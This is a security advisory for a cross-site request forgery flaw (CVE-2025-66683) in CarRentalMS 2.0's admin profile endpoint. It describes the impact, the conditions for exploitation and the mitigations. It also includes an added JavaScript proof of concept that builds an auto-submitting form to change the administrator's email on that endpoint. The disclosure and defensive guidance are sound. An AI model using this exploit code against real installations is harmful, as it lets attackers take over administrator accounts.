CarRentalMS 2.0 Cross Site Request Forgery
CarRentalMS 2.0 was susceptible to Cross-Site Request Forgery (CSRF) attacks. The vulnerability allowed an attacker to trick a logged-in user into performing unintended actions within the application without their knowledge.

For example, a malicious website could embed a hidden, auto-submitting form that, when visited by an authenticated CarRentalMS 2.0 user, would force their browser to send a state-changing request (such as modifying the administrator's profile details) with the user's session cookie attached, without their consent.

The flaw arises because the application accepts a state-changing request on the strength of the session cookie alone and never verifies that the request was intentionally issued from its own pages. The impact includes unauthorized data manipulation and, where the modified data is relied on for authentication (for instance a profile email address used for password recovery), account takeover. Mitigation is to bind every state-changing request to the user's session with an anti-CSRF token, with `SameSite` cookie attributes as defence in depth.

## Description

A Cross-Site Request Forgery (CSRF) vulnerability exists in the administrator profile update functionality of **CarRentalMS v2.0**. The affected endpoint does not implement anti-CSRF protections, allowing an attacker to perform unauthorized profile modifications on behalf of an authenticated administrator via crafted HTML content.

This issue has been assigned **CVE-2025-66683**.

## Affected Product

- Project: CarRentalMS
- Version: 2.0
- Vendor: Mart Mbithi

## Affected Component

- Endpoint: `/CarRentalMS/ui/backoffice_settings`
- Functionality: Admin profile update

## Vulnerability Type

- Cross-Site Request Forgery (CSRF)
- CWE-352

## Attack Vector

Remote. An attacker can lure an authenticated administrator into visiting a malicious webpage (e.g., via a malicious advertisement or compromised website), which silently submits a forged POST request to the vulnerable endpoint.

## Impact

Successful exploitation allows unauthorized modification of administrator profile details, including the email address. Where the application's password-recovery flow relies on the profile email, an attacker-controlled address on the administrator account can result in:

- Full account takeover
- Privilege escalation (the attacker gains administrator rights they did not previously hold)
- Persistence establishment
- Potential data exfiltration

## Conditions for Exploitation

- Administrator is authenticated (holds a valid session cookie)
- No anti-CSRF tokens are implemented
- No `SameSite` cookie protections are enforced, so the browser still attaches the session cookie to the cross-site POST (most current browsers treat a cookie without an explicit attribute as `Lax`, which withholds it from most cross-site form submissions; an explicit `SameSite=None` or an older browser removes that protection)
- User interaction with attacker-controlled HTML content (a single page visit suffices; no further action by the administrator is required)

## Proof of Concept
A working proof of concept demonstrates exploitation by auto-submitting a crafted HTML form while an administrator session is active, resulting in profile data being modified without user consent.
(PoC details provided to maintainers; not fully reproduced here.)
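The shape of the auto-submitting page the paragraph above describes, as an added illustration that is not the researcher's PoC and not code from CarRentalMS: the target path is the one named in this advisory, while the host name and the form field names (`email`, `name`) are assumptions, since the advisory does not publish the real parameter names.

```javascript
// Added example (not the advisory's PoC): builds the kind of auto-submitting
// cross-site form that exploits a CSRF-unprotected endpoint. The path is the
// one named in the advisory; the host and the field names are ASSUMED.
const TARGET = "http://carrentalms.example/CarRentalMS/ui/backoffice_settings";

// Escape attacker-chosen values so they land in the attributes intact.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Returns an HTML document that POSTs `fields` to `action` as soon as it loads.
// The victim's browser attaches the CarRentalMS session cookie on its own,
// which is what makes the forged request look legitimate to a server that
// checks nothing beyond the cookie.
function buildCsrfPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n    ");
  return `<!DOCTYPE html>
<html><body>
  <form id="f" method="POST" action="${escapeHtml(action)}">
    ${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>
</body></html>`;
}

// Hypothetical field names: the real parameter names are not published.
const poc = buildCsrfPage(TARGET, {
  email: "attacker@example.com",
  name: "Administrator",
});
```

Hosting `poc` on any origin the administrator visits is the whole attack; the victim sees at most a blank page before the redirect to the application's own response.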

## Mitigation Recommendations

- Implement anti-CSRF tokens (e.g., the synchronizer token pattern: a per-session random token embedded in every state-changing form and verified server-side on submission)
- Enforce `SameSite=Lax` or `SameSite=Strict` on the session cookie, together with `HttpOnly` and `Secure`
- Validate the `Origin` and `Referer` headers on state-changing requests, rejecting cross-site values
- Require re-authentication (current password) before sensitive profile changes such as the email address, and accept state changes only via POST, never GET

## References
- [https://cwe.mitre.org/data/definitions/352.html](https://cwe.mitre.org/data/definitions/352.html)
- [https://owasp.org/www-community/attacks/csrf](https://owasp.org/www-community/attacks/csrf)
- [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite)

## Discoverer
Parthiv Kumar Nikku
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸